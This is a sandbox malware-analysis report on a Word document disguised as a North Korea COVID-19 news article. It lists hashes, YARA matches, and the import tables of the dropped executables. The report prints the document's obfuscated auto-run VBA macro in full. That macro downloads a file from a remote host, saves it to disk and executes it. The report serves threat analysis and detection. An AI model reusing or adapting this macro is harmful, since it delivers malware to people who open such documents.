70fa2300...7665 | Files
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification:
Dropper
Downloader
Threat Names:
VBA:Amphitryon.1265
Gen:Variant.Graftor.596138
Gen:Variant.Zusy.308149
...

Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia.doc

Word Document

Created at 2020-12-23T15:02:00

Remarks (1/1)

(0x0200000E): The overall sleep time of all monitored processes was truncated from "11 minutes" to "1 minute, 50 seconds" to reveal dormant functionality.

Filters:
Filename Category Type Severity Actions
C:\Users\FD1HVy\Desktop\Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia.doc Sample File Word Document
Malicious
»
Mime Type application/msword
File Size 52.00 KB
MD5 90a59c16d670fd77d710516299533834 Copy to Clipboard
SHA1 25c0a651d7bdfdfca2f37160837829bea669c5f7 Copy to Clipboard
SHA256 70fa2300d7932ab901c19878bf109bdd9e078e96380879ca2ce2c3f9fc5c7665 Copy to Clipboard
SSDeep 384:Mo8AY64U4jOHgiI/6iSY5UFXoOfYxFSAtcwqVCM+V0hxtjiK6yOrX0jui3M:t/7dRc6lCMvxp6yOL5i Copy to Clipboard
ImpHash -
Parser Error Remark Static engine was unable to completely parse the analyzed file
Office Information
»
Creator SNOOPY
Last Modified By user
Revision 5
Create Time 2020-11-26 22:28:00+00:00
Modify Time 2020-11-26 22:37:00+00:00
Document Information
»
Codepage ANSI_Latin1
Application Microsoft Office Word
App Version 14.0
Template Normal.dotm
Company Microsoft
Document Security NONE
Editing Time 120.0
Page Count 3
Line Count 28
Paragraph Count 8
Word Count 599
Character Count 3417
Chars With Spaces 4008
scale_crop False
shared_doc False
_PID_HLINKS ['https://www.nknews.org/2020/08/kaesong-lockdown-lifted-at-north-korean-politburo-meeting-led-by-kim-jong-un/?t=1603769778434', 'https://www.nknews.org/2020/08/unicef-says-north-korea-decided-to-temporarily-close-nampho-port-late-july/?t=1604306607548', 'https://www.nknews.org/2020/10/north-korea-urges-people-indoors-fearing-dust-from-china-will-spread-covid-19/?t=1604306607548', 'https://www.nknews.org/pro/full-text-north-koreas-decree-to-shoot-people-illegally-approaching-border/?t=1603703245483', 'https://www.un.org/en/coronavirus/covid-19-faqs']
Controls (1)
»
CLSID Control Name Associated Vulnerability
{00020906-0000-0000-C000-000000000046} Word97 -
VBA Macros (1)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Open()



  Dim euelis As Object
    Dim itelro As String

    Set euelis = CreateObject("WScript.Shell")
    itelro = euelis.SpecialFolders("Templates")
Dim bbb
Dim ccc
Dim ddd
Dim eee
Dim fff
Dim ggg As Integer
Dim hhh
Dim iii
ggg = 1


ActiveDocument.Range.Font.Color = wdColorBlack

Set hhh = CreateObject("microsoft.xmlhttp")
Dim dfefef
dfefef = Chr(88395 / &H429) + Chr(-6659 + &H1A6B) & Chr(-5652 + &H1679) & Chr(111348 / &H407) & Chr(-2738 + &HB1E) & Chr(136114 / &HB8F) & Chr(195715 / &HBC3) & Chr(1097488 / &H2647) & Chr(-2672 + &HAE0) & Chr(175932 / &H65D) & Chr(430710 / &H1006) & Chr(705672 / &H1BD8) & Chr(-6236 + &H18BD) & Chr(215876 / &H745) & Chr(84840 / &H328) & Chr(1005438 / &H2362) & Chr(863830 / &H1EAD)
Set fff = CreateObject(dfefef)
eee = itelro & Chr(649152 / CLng(&H1B90)) & Chr(666540 / CLng(&H16A4)) & Chr(338240 / CLng(&HBCC)) & Chr(15651 / CLng(&H8D)) & Chr(879768 / CLng(&H1FD2)) & Chr(52325 / CLng(&H1C7)) & Chr(1017986 / CLng(&H21B3)) & Chr(377336 / CLng(&HE98)) & Chr(-8669 + CLng(&H220B)) & Chr(959197 / CLng(&H2519)) & Chr(630000 / CLng(&H1482)) & Chr(54136 / CLng(&H218))

zzz = Chr(733824 / CLng(&H1B90)) & Chr(672336 / CLng(&H16A4)) & Chr(350320 / CLng(&HBCC)) & Chr(15792 / CLng(&H8D)) & Chr(936790 / CLng(&H1FD2)) & Chr(26390 / CLng(&H1C7)) & Chr(405469 / CLng(&H21B3)) & Chr(175592 / CLng(&HE98)) & Chr(-8596 + CLng(&H220B)) & Chr(1130143 / CLng(&H2519)) & Chr(624750 / CLng(&H1482)) & Chr(24656 / CLng(&H218)) & Chr(534432 / CLng(&H1250)) & Chr(604116 / CLng(&H1854)) & Chr(258622 / CLng(&HA4F)) & Chr(805003 / CLng(&H206B)) & Chr(589300 / CLng(&H1705)) & Chr(-9014 + CLng(&H2397)) & Chr(813384 / CLng(&H1B28)) & Chr(268400 / CLng(&H988)) & Chr(48990 / CLng(&H429)) & Chr(-6664 + CLng(&H1A6B)) & Chr(-5642 + CLng(&H1679)) & Chr(112379 / CLng(&H407)) & Chr(-2799 + CLng(&HB1E)) & Chr(352121 / CLng(&HB8F)) & Chr(334221 / CLng(&HBC3)) & Chr(1117086 / CLng(&H2647)) & Chr(-2684 + CLng(&HAE0)) & Chr(182448 / CLng(&H65D)) & Chr(467628 / CLng(&H1006)) & Chr(719928 / CLng(&H1BD8)) & Chr(-6218 + CLng(&H18BD))

yyy = Chr(214015 / CLng(&H745)) & Chr(37976 / CLng(&H328)) & Chr(1077902 / CLng(&H2362)) & Chr(879536 / CLng(&H1EAD)) & Chr(130410 / CLng(&HB52)) & Chr(625482 / CLng(&H18AE)) & Chr(-4175 + CLng(&H10BE)) & Chr(617210 / CLng(&H15EB)) & Chr(1060008 / CLng(&H23B2)) & Chr(22927 / CLng(&HE3)) & Chr(1007930 / CLng(&H23CB)) & Chr(786480 / CLng(&H1A7C)) & Chr(241486 / CLng(&H1412)) & Chr(410176 / CLng(&HDD0)) & Chr(-2594 + CLng(&HA8A)) & Chr(246339 / CLng(&H987)) & Chr(66490 / CLng(&H262)) & Chr(368751 / CLng(&HE43)) & Chr(179170 / CLng(&H616)) & Chr(120978 / CLng(&HA0E)) & Chr(-5338 + CLng(&H152E)) & Chr(647634 / CLng(&H24AA)) & Chr(389774 / CLng(&H13C6)) & Chr(86000 / CLng(&H433)) & Chr(211462 / CLng(&H11F5)) & Chr(685630 / CLng(&H174A)) & Chr(-78 + CLng(&HBD))

hhh.Open "get", zzz + yyy, False
hhh.send
ccc = hhh.responseBody
If hhh.Status = 200 Then
Set bbb = CreateObject("adodb.stream")
bbb.Open
bbb.Type = ggg
bbb.Write ccc
bbb.SaveToFile eee, ggg + ggg
bbb.Close
End If
fff.Open (eee)
End Sub







Document Content Snippet
»
Pyongyang stores low on foreign goods amid North Korean COVID-19 paranoia Amid an ongoing, full-scale border lockdown against COVID-19, North Korea on Tuesday warned its citizens against relying on imported foreign goods calling the habit a dangerous disease that could spread the virus from abroad. Pyongyangs warning against bringing in foreign goods is not just empty words, either: On Monday, sources toldVOAthat supermarkets and shops in Pyongyang have lacked foreign-sourced staples for months, including coffee, cocoa and chocolate. This appears to be out of paranoia that foreign goods could carry traces of COVID-19 which is possible, HYPERLINK "https://www.un.org/en/coronavirus/covid-19-faqs" according to the United Nations, though not the most common way the virus has been transmitted worldwide. Sources also toldVOAthat theres currently no evidence that food items are coming across the border from China, with only locally produced items available on Pyongyang store shelves. INT ...
Local AV Matches (1)
»
Threat Name Severity
VBA:Amphitryon.1265
Malicious
YARA Matches (3)
»
Rule Name Rule Description Classification Score Actions
VBA_Execution_Commands VBA macro may execute files or system commands -
3/5
VBA_Create_File VBA macro contains file creation commands; possible dropper -
2/5
VBA_Download_Commands VBA macro may attempt to download external content; possible dropper -
2/5
c:\users\fd1hvy\appdata\local\temp\liebert.bmp Dropped File Binary
Malicious
»
Mime Type application/vnd.microsoft.portable-executable
File Size 67.00 KB
MD5 f108a4d064dd05c0a097f517ec738b1a Copy to Clipboard
SHA1 f197a7be7fdb286bc9673a57b54994c02a7af8d6 Copy to Clipboard
SHA256 d1baefd0bdc7f3b0369c5b7126c3b98469a518cf4db788fad1d243d8661a17b9 Copy to Clipboard
SSDeep 1536:kW5DsMyKp7Pf+h++qpCMi91GPGfuFj6nniFIlkK1wdS1A:55DsklPf+h5qmhW56nief1wdS Copy to Clipboard
ImpHash 6b098027ff46fe7329c1dbb6421e85dc Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
Names Mal/Generic-S
PE Information
»
Image Base 0x400000
Entry Point 0x404656
Size Of Code 0xc400
Size Of Initialized Data 0x19a00
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2020-11-19 17:00:55+00:00
Sections (3)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0xc355 0xc400 0x400 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.58
.rdata 0x40e000 0x2ec8 0x3000 0xc800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 4.92
.data 0x411000 0x16920 0x1400 0xf800 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 3.02
Imports (5)
»
KERNEL32.dll (82)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CreateFileA 0x0 0x40e008 0x106ec 0xeeec 0x88
CloseHandle 0x0 0x40e00c 0x106f0 0xeef0 0x52
GetFileAttributesA 0x0 0x40e010 0x106f4 0xeef4 0x1e5
CreateDirectoryA 0x0 0x40e014 0x106f8 0xeef8 0x7c
WriteFile 0x0 0x40e018 0x106fc 0xeefc 0x525
CreateProcessA 0x0 0x40e01c 0x10700 0xef00 0xa4
GetTempPathA 0x0 0x40e020 0x10704 0xef04 0x284
Sleep 0x0 0x40e024 0x10708 0xef08 0x4b2
GetVersionExA 0x0 0x40e028 0x1070c 0xef0c 0x2a3
GetProcAddress 0x0 0x40e02c 0x10710 0xef10 0x245
WaitForSingleObject 0x0 0x40e030 0x10714 0xef14 0x4f9
GetSystemInfo 0x0 0x40e034 0x10718 0xef18 0x273
GetComputerNameA 0x0 0x40e038 0x1071c 0xef1c 0x18c
GetVolumeInformationA 0x0 0x40e03c 0x10720 0xef20 0x2a5
LoadLibraryA 0x0 0x40e040 0x10724 0xef24 0x33c
FreeLibrary 0x0 0x40e044 0x10728 0xef28 0x162
GetSystemDirectoryA 0x0 0x40e048 0x1072c 0xef2c 0x26f
GetFileSize 0x0 0x40e04c 0x10730 0xef30 0x1f0
GetModuleHandleA 0x0 0x40e050 0x10734 0xef34 0x215
GetModuleFileNameA 0x0 0x40e054 0x10738 0xef38 0x213
CreateFileW 0x0 0x40e058 0x1073c 0xef3c 0x8f
GetProcessHeap 0x0 0x40e05c 0x10740 0xef40 0x24a
SetEndOfFile 0x0 0x40e060 0x10744 0xef44 0x453
GetStringTypeW 0x0 0x40e064 0x10748 0xef48 0x269
LCMapStringW 0x0 0x40e068 0x1074c 0xef4c 0x32d
HeapReAlloc 0x0 0x40e06c 0x10750 0xef50 0x2d2
HeapSize 0x0 0x40e070 0x10754 0xef54 0x2d4
WriteConsoleW 0x0 0x40e074 0x10758 0xef58 0x524
FlushFileBuffers 0x0 0x40e078 0x1075c 0xef5c 0x157
SetStdHandle 0x0 0x40e07c 0x10760 0xef60 0x487
SetFilePointer 0x0 0x40e080 0x10764 0xef64 0x466
IsValidCodePage 0x0 0x40e084 0x10768 0xef68 0x30a
GetOEMCP 0x0 0x40e088 0x1076c 0xef6c 0x237
GetCommandLineA 0x0 0x40e08c 0x10770 0xef70 0x186
HeapSetInformation 0x0 0x40e090 0x10774 0xef74 0x2d3
SetUnhandledExceptionFilter 0x0 0x40e094 0x10778 0xef78 0x4a5
GetModuleHandleW 0x0 0x40e098 0x1077c 0xef7c 0x218
ExitProcess 0x0 0x40e09c 0x10780 0xef80 0x119
DecodePointer 0x0 0x40e0a0 0x10784 0xef84 0xca
GetStdHandle 0x0 0x40e0a4 0x10788 0xef88 0x264
GetModuleFileNameW 0x0 0x40e0a8 0x1078c 0xef8c 0x214
FreeEnvironmentStringsW 0x0 0x40e0ac 0x10790 0xef90 0x161
WideCharToMultiByte 0x0 0x40e0b0 0x10794 0xef94 0x511
GetEnvironmentStringsW 0x0 0x40e0b4 0x10798 0xef98 0x1da
SetHandleCount 0x0 0x40e0b8 0x1079c 0xef9c 0x46f
InitializeCriticalSectionAndSpinCount 0x0 0x40e0bc 0x107a0 0xefa0 0x2e3
GetFileType 0x0 0x40e0c0 0x107a4 0xefa4 0x1f3
GetStartupInfoW 0x0 0x40e0c4 0x107a8 0xefa8 0x263
DeleteCriticalSection 0x0 0x40e0c8 0x107ac 0xefac 0xd1
EncodePointer 0x0 0x40e0cc 0x107b0 0xefb0 0xea
TlsAlloc 0x0 0x40e0d0 0x107b4 0xefb4 0x4c5
TlsGetValue 0x0 0x40e0d4 0x107b8 0xefb8 0x4c7
TlsSetValue 0x0 0x40e0d8 0x107bc 0xefbc 0x4c8
TlsFree 0x0 0x40e0dc 0x107c0 0xefc0 0x4c6
InterlockedIncrement 0x0 0x40e0e0 0x107c4 0xefc4 0x2ef
SetLastError 0x0 0x40e0e4 0x107c8 0xefc8 0x473
GetCurrentThreadId 0x0 0x40e0e8 0x107cc 0xefcc 0x1c5
GetLastError 0x0 0x40e0ec 0x107d0 0xefd0 0x202
InterlockedDecrement 0x0 0x40e0f0 0x107d4 0xefd4 0x2eb
HeapCreate 0x0 0x40e0f4 0x107d8 0xefd8 0x2cd
QueryPerformanceCounter 0x0 0x40e0f8 0x107dc 0xefdc 0x3a7
GetTickCount 0x0 0x40e0fc 0x107e0 0xefe0 0x293
GetCurrentProcessId 0x0 0x40e100 0x107e4 0xefe4 0x1c1
GetSystemTimeAsFileTime 0x0 0x40e104 0x107e8 0xefe8 0x279
TerminateProcess 0x0 0x40e108 0x107ec 0xefec 0x4c0
GetCurrentProcess 0x0 0x40e10c 0x107f0 0xeff0 0x1c0
UnhandledExceptionFilter 0x0 0x40e110 0x107f4 0xeff4 0x4d3
IsDebuggerPresent 0x0 0x40e114 0x107f8 0xeff8 0x300
IsProcessorFeaturePresent 0x0 0x40e118 0x107fc 0xeffc 0x304
EnterCriticalSection 0x0 0x40e11c 0x10800 0xf000 0xee
LeaveCriticalSection 0x0 0x40e120 0x10804 0xf004 0x339
RtlUnwind 0x0 0x40e124 0x10808 0xf008 0x418
MultiByteToWideChar 0x0 0x40e128 0x1080c 0xf00c 0x367
ReadFile 0x0 0x40e12c 0x10810 0xf010 0x3c0
HeapFree 0x0 0x40e130 0x10814 0xf014 0x2cf
GetConsoleCP 0x0 0x40e134 0x10818 0xf018 0x19a
GetConsoleMode 0x0 0x40e138 0x1081c 0xf01c 0x1ac
HeapAlloc 0x0 0x40e13c 0x10820 0xf020 0x2cb
RaiseException 0x0 0x40e140 0x10824 0xf024 0x3b1
LoadLibraryW 0x0 0x40e144 0x10828 0xf028 0x33f
GetCPInfo 0x0 0x40e148 0x1082c 0xf02c 0x172
GetACP 0x0 0x40e14c 0x10830 0xf030 0x168
USER32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetSystemMetrics 0x0 0x40e15c 0x10840 0xf040 0x17e
ADVAPI32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetUserNameA 0x0 0x40e000 0x106e4 0xeee4 0x164
SHELL32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ShellExecuteExA 0x0 0x40e154 0x10838 0xf038 0x120
WS2_32.dll (11)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
recv 0x10 0x40e164 0x10848 0xf048 -
send 0x13 0x40e168 0x1084c 0xf04c -
connect 0x4 0x40e16c 0x10850 0xf050 -
closesocket 0x3 0x40e170 0x10854 0xf054 -
htons 0x9 0x40e174 0x10858 0xf058 -
socket 0x17 0x40e178 0x1085c 0xf05c -
WSAStartup 0x73 0x40e17c 0x10860 0xf060 -
WSACleanup 0x74 0x40e180 0x10864 0xf064 -
gethostbyname 0x34 0x40e184 0x10868 0xf068 -
inet_ntoa 0xc 0x40e188 0x1086c 0xf06c -
inet_addr 0xb 0x40e18c 0x10870 0xf070 -
Local AV Matches (1)
»
Threat Name Severity
Gen:Variant.Graftor.596138
Malicious
c:\programdata\a7963\tlworker.exe Dropped File Binary
Malicious
»
Also Known As C:\Users\FD1HVy\AppData\Roaming\Microsoft\Windows\Templates\spolsve.exe (Dropped File)
c:\users\fd1hvy\appdata\roaming\microsoft\windows\templates\spolsve.exe (Dropped File)
c:\users\fd1hvy\appdata\local\microsoft\windows\inetcache\ie\5alfeguz\temp[1].so (Dropped File)
Mime Type application/vnd.microsoft.portable-executable
File Size 284.00 KB
MD5 f160c057fded2c01bfdb65bb7aa9dfcc Copy to Clipboard
SHA1 1e14de870b1c4b09cbf81206562a254c27178d85 Copy to Clipboard
SHA256 efc139dc0e280a374065dc59c55a45b5146f091a85a3abd6f0caf1a9a2f8b060 Copy to Clipboard
SSDeep 6144:deSI8dD+Zp4IWoafJC8WVpH4dx98hNVVjr/:deSI8ha4ItNVVn Copy to Clipboard
ImpHash 35d1e2dd9caee6ca5d2146aa4334cd09 Copy to Clipboard
File Reputation Information
»
Severity
Blacklisted
Names Mal/Generic-S
PE Information
»
Image Base 0x400000
Entry Point 0x409cb0
Size Of Code 0x21000
Size Of Initialized Data 0x25000
File Type FileType.executable
Subsystem Subsystem.windows_gui
Machine Type MachineType.i386
Compile Timestamp 2016-12-06 11:35:32+00:00
Sections (4)
»
Name Virtual Address Virtual Size Raw Data Size Raw Data Offset Flags Entropy
.text 0x401000 0x2033b 0x21000 0x1000 IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ 6.53
.rdata 0x422000 0x10618 0x11000 0x22000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ 5.9
.data 0x433000 0x63a8 0x3000 0x33000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 3.34
.pnuvq 0x43a000 0x10c8f 0x11000 0x36000 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE 7.9
Imports (11)
»
KERNEL32.dll (113)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
TerminateProcess 0x0 0x4220bc 0x30d24 0x30d24 0x29e
HeapFree 0x0 0x4220c0 0x30d28 0x30d28 0x19f
HeapAlloc 0x0 0x4220c4 0x30d2c 0x30d2c 0x199
RaiseException 0x0 0x4220c8 0x30d30 0x30d30 0x20b
HeapReAlloc 0x0 0x4220cc 0x30d34 0x30d34 0x1a2
HeapSize 0x0 0x4220d0 0x30d38 0x30d38 0x1a3
GetACP 0x0 0x4220d4 0x30d3c 0x30d3c 0xb9
GetTimeZoneInformation 0x0 0x4220d8 0x30d40 0x30d40 0x170
UnhandledExceptionFilter 0x0 0x4220dc 0x30d44 0x30d44 0x2ad
FreeEnvironmentStringsA 0x0 0x4220e0 0x30d48 0x30d48 0xb2
FreeEnvironmentStringsW 0x0 0x4220e4 0x30d4c 0x30d4c 0xb3
GetEnvironmentStrings 0x0 0x4220e8 0x30d50 0x30d50 0x106
GetEnvironmentStringsW 0x0 0x4220ec 0x30d54 0x30d54 0x108
SetHandleCount 0x0 0x4220f0 0x30d58 0x30d58 0x26d
GetStdHandle 0x0 0x4220f4 0x30d5c 0x30d5c 0x152
GetFileType 0x0 0x4220f8 0x30d60 0x30d60 0x115
HeapDestroy 0x0 0x4220fc 0x30d64 0x30d64 0x19d
HeapCreate 0x0 0x422100 0x30d68 0x30d68 0x19b
VirtualFree 0x0 0x422104 0x30d6c 0x30d6c 0x2bf
ExitProcess 0x0 0x422108 0x30d70 0x30d70 0x7d
VirtualAlloc 0x0 0x42210c 0x30d74 0x30d74 0x2bb
IsBadWritePtr 0x0 0x422110 0x30d78 0x30d78 0x1b8
SetUnhandledExceptionFilter 0x0 0x422114 0x30d7c 0x30d7c 0x28b
LCMapStringA 0x0 0x422118 0x30d80 0x30d80 0x1bf
LCMapStringW 0x0 0x42211c 0x30d84 0x30d84 0x1c0
GetStringTypeA 0x0 0x422120 0x30d88 0x30d88 0x153
GetStringTypeW 0x0 0x422124 0x30d8c 0x30d8c 0x156
IsBadReadPtr 0x0 0x422128 0x30d90 0x30d90 0x1b5
IsBadCodePtr 0x0 0x42212c 0x30d94 0x30d94 0x1b2
SetStdHandle 0x0 0x422130 0x30d98 0x30d98 0x27c
CompareStringA 0x0 0x422134 0x30d9c 0x30d9c 0x21
CompareStringW 0x0 0x422138 0x30da0 0x30da0 0x22
SetEnvironmentVariableA 0x0 0x42213c 0x30da4 0x30da4 0x262
GetCommandLineA 0x0 0x422140 0x30da8 0x30da8 0xca
GetStartupInfoA 0x0 0x422144 0x30dac 0x30dac 0x150
RtlUnwind 0x0 0x422148 0x30db0 0x30db0 0x22f
GetProfileStringA 0x0 0x42214c 0x30db4 0x30db4 0x14b
FormatMessageA 0x0 0x422150 0x30db8 0x30db8 0xaf
GetFileTime 0x0 0x422154 0x30dbc 0x30dbc 0x114
GetFileSize 0x0 0x422158 0x30dc0 0x30dc0 0x112
GetFileAttributesA 0x0 0x42215c 0x30dc4 0x30dc4 0x10d
GetTickCount 0x0 0x422160 0x30dc8 0x30dc8 0x16d
FileTimeToLocalFileTime 0x0 0x422164 0x30dcc 0x30dcc 0x89
FileTimeToSystemTime 0x0 0x422168 0x30dd0 0x30dd0 0x8a
GetFullPathNameA 0x0 0x42216c 0x30dd4 0x30dd4 0x116
GetVolumeInformationA 0x0 0x422170 0x30dd8 0x30dd8 0x177
FindFirstFileA 0x0 0x422174 0x30ddc 0x30ddc 0x94
FindClose 0x0 0x422178 0x30de0 0x30de0 0x90
SetEndOfFile 0x0 0x42217c 0x30de4 0x30de4 0x261
UnlockFile 0x0 0x422180 0x30de8 0x30de8 0x2ae
LockFile 0x0 0x422184 0x30dec 0x30dec 0x1d3
FlushFileBuffers 0x0 0x422188 0x30df0 0x30df0 0xaa
SetFilePointer 0x0 0x42218c 0x30df4 0x30df4 0x26a
WriteFile 0x0 0x422190 0x30df8 0x30df8 0x2df
ReadFile 0x0 0x422194 0x30dfc 0x30dfc 0x218
CreateFileA 0x0 0x422198 0x30e00 0x30e00 0x34
GetCurrentProcess 0x0 0x42219c 0x30e04 0x30e04 0xf7
DuplicateHandle 0x0 0x4221a0 0x30e08 0x30e08 0x63
SetErrorMode 0x0 0x4221a4 0x30e0c 0x30e0c 0x264
GetOEMCP 0x0 0x4221a8 0x30e10 0x30e10 0x131
GetCPInfo 0x0 0x4221ac 0x30e14 0x30e14 0xbf
GetThreadLocale 0x0 0x4221b0 0x30e18 0x30e18 0x168
SizeofResource 0x0 0x4221b4 0x30e1c 0x30e1c 0x295
GetProcessVersion 0x0 0x4221b8 0x30e20 0x30e20 0x145
GetLastError 0x0 0x4221bc 0x30e24 0x30e24 0x11a
WritePrivateProfileStringA 0x0 0x4221c0 0x30e28 0x30e28 0x2e5
GlobalFlags 0x0 0x4221c4 0x30e2c 0x30e2c 0x187
lstrcpynA 0x0 0x4221c8 0x30e30 0x30e30 0x305
TlsGetValue 0x0 0x4221cc 0x30e34 0x30e34 0x2a4
LocalReAlloc 0x0 0x4221d0 0x30e38 0x30e38 0x1cf
TlsSetValue 0x0 0x4221d4 0x30e3c 0x30e3c 0x2a5
EnterCriticalSection 0x0 0x4221d8 0x30e40 0x30e40 0x66
GlobalReAlloc 0x0 0x4221dc 0x30e44 0x30e44 0x18f
LeaveCriticalSection 0x0 0x4221e0 0x30e48 0x30e48 0x1c1
TlsFree 0x0 0x4221e4 0x30e4c 0x30e4c 0x2a3
GlobalHandle 0x0 0x4221e8 0x30e50 0x30e50 0x18b
DeleteCriticalSection 0x0 0x4221ec 0x30e54 0x30e54 0x55
TlsAlloc 0x0 0x4221f0 0x30e58 0x30e58 0x2a2
InitializeCriticalSection 0x0 0x4221f4 0x30e5c 0x30e5c 0x1aa
LocalFree 0x0 0x4221f8 0x30e60 0x30e60 0x1cc
LocalAlloc 0x0 0x4221fc 0x30e64 0x30e64 0x1c8
MulDiv 0x0 0x422200 0x30e68 0x30e68 0x1e3
SetLastError 0x0 0x422204 0x30e6c 0x30e6c 0x271
MultiByteToWideChar 0x0 0x422208 0x30e70 0x30e70 0x1e4
WideCharToMultiByte 0x0 0x42220c 0x30e74 0x30e74 0x2d2
InterlockedIncrement 0x0 0x422210 0x30e78 0x30e78 0x1b0
InterlockedDecrement 0x0 0x422214 0x30e7c 0x30e7c 0x1ad
LoadLibraryA 0x0 0x422218 0x30e80 0x30e80 0x1c2
FreeLibrary 0x0 0x42221c 0x30e84 0x30e84 0xb4
GetVersion 0x0 0x422220 0x30e88 0x30e88 0x174
lstrcatA 0x0 0x422224 0x30e8c 0x30e8c 0x2f9
GlobalGetAtomNameA 0x0 0x422228 0x30e90 0x30e90 0x189
GlobalAddAtomA 0x0 0x42222c 0x30e94 0x30e94 0x17f
GlobalFindAtomA 0x0 0x422230 0x30e98 0x30e98 0x184
lstrcpyA 0x0 0x422234 0x30e9c 0x30e9c 0x302
GetModuleHandleA 0x0 0x422238 0x30ea0 0x30ea0 0x126
GetProcAddress 0x0 0x42223c 0x30ea4 0x30ea4 0x13e
GlobalUnlock 0x0 0x422240 0x30ea8 0x30ea8 0x193
GlobalFree 0x0 0x422244 0x30eac 0x30eac 0x188
LockResource 0x0 0x422248 0x30eb0 0x30eb0 0x1d5
FindResourceA 0x0 0x42224c 0x30eb4 0x30eb4 0xa3
LoadResource 0x0 0x422250 0x30eb8 0x30eb8 0x1c7
CloseHandle 0x0 0x422254 0x30ebc 0x30ebc 0x1b
GlobalLock 0x0 0x422258 0x30ec0 0x30ec0 0x18c
GlobalAlloc 0x0 0x42225c 0x30ec4 0x30ec4 0x181
GlobalDeleteAtom 0x0 0x422260 0x30ec8 0x30ec8 0x183
lstrcmpA 0x0 0x422264 0x30ecc 0x30ecc 0x2fc
lstrcmpiA 0x0 0x422268 0x30ed0 0x30ed0 0x2ff
GetCurrentThread 0x0 0x42226c 0x30ed4 0x30ed4 0xf9
GetCurrentThreadId 0x0 0x422270 0x30ed8 0x30ed8 0xfa
lstrlenA 0x0 0x422274 0x30edc 0x30edc 0x308
GetModuleFileNameA 0x0 0x422278 0x30ee0 0x30ee0 0x124
VirtualProtect 0x0 0x42227c 0x30ee4 0x30ee4 0x2c3
USER32.dll (126)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetRect 0x0 0x4222b4 0x30f1c 0x30f1c 0x244
GetNextDlgGroupItem 0x0 0x4222b8 0x30f20 0x30f20 0x132
MessageBeep 0x0 0x4222bc 0x30f24 0x30f24 0x1bd
InvalidateRect 0x0 0x4222c0 0x30f28 0x30f28 0x17a
CharUpperA 0x0 0x4222c4 0x30f2c 0x30f2c 0x2f
InflateRect 0x0 0x4222c8 0x30f30 0x30f30 0x171
RegisterClipboardFormatA 0x0 0x4222cc 0x30f34 0x30f34 0x1f6
PostThreadMessageA 0x0 0x4222d0 0x30f38 0x30f38 0x1e1
SetFocus 0x0 0x4222d4 0x30f3c 0x30f3c 0x22f
AdjustWindowRectEx 0x0 0x4222d8 0x30f40 0x30f40 0x2
ScreenToClient 0x0 0x4222dc 0x30f44 0x30f44 0x20a
CopyRect 0x0 0x4222e0 0x30f48 0x30f48 0x44
GetTopWindow 0x0 0x4222e4 0x30f4c 0x30f4c 0x14c
IsChild 0x0 0x4222e8 0x30f50 0x30f50 0x185
GetCapture 0x0 0x4222ec 0x30f54 0x30f54 0xe4
WinHelpA 0x0 0x4222f0 0x30f58 0x30f58 0x2a6
wsprintfA 0x0 0x4222f4 0x30f5c 0x30f5c 0x2ac
GetClassInfoA 0x0 0x4222f8 0x30f60 0x30f60 0xe7
RegisterClassA 0x0 0x4222fc 0x30f64 0x30f64 0x1f2
GetMenu 0x0 0x422300 0x30f68 0x30f68 0x11c
GetMenuItemCount 0x0 0x422304 0x30f6c 0x30f6c 0x122
GetSubMenu 0x0 0x422308 0x30f70 0x30f70 0x142
GetMenuItemID 0x0 0x42230c 0x30f74 0x30f74 0x123
GetWindowTextLengthA 0x0 0x422310 0x30f78 0x30f78 0x15f
GetWindowTextA 0x0 0x422314 0x30f7c 0x30f7c 0x15e
GetDlgCtrlID 0x0 0x422318 0x30f80 0x30f80 0x101
DefWindowProcA 0x0 0x42231c 0x30f84 0x30f84 0x84
CreateWindowExA 0x0 0x422320 0x30f88 0x30f88 0x59
GetClassLongA 0x0 0x422324 0x30f8c 0x30f8c 0xeb
SetPropA 0x0 0x422328 0x30f90 0x30f90 0x242
UnhookWindowsHookEx 0x0 0x42232c 0x30f94 0x30f94 0x286
GetPropA 0x0 0x422330 0x30f98 0x30f98 0x13a
CallWindowProcA 0x0 0x422334 0x30f9c 0x30f9c 0x16
RemovePropA 0x0 0x422338 0x30fa0 0x30fa0 0x205
CopyAcceleratorTableA 0x0 0x42233c 0x30fa4 0x30fa4 0x40
GetMessagePos 0x0 0x422340 0x30fa8 0x30fa8 0x12c
GetForegroundWindow 0x0 0x422344 0x30fac 0x30fac 0x108
GetClassNameA 0x0 0x422348 0x30fb0 0x30fb0 0xed
SetWindowLongA 0x0 0x42234c 0x30fb4 0x30fb4 0x258
RegisterWindowMessageA 0x0 0x422350 0x30fb8 0x30fb8 0x200
OffsetRect 0x0 0x422354 0x30fbc 0x30fbc 0x1d2
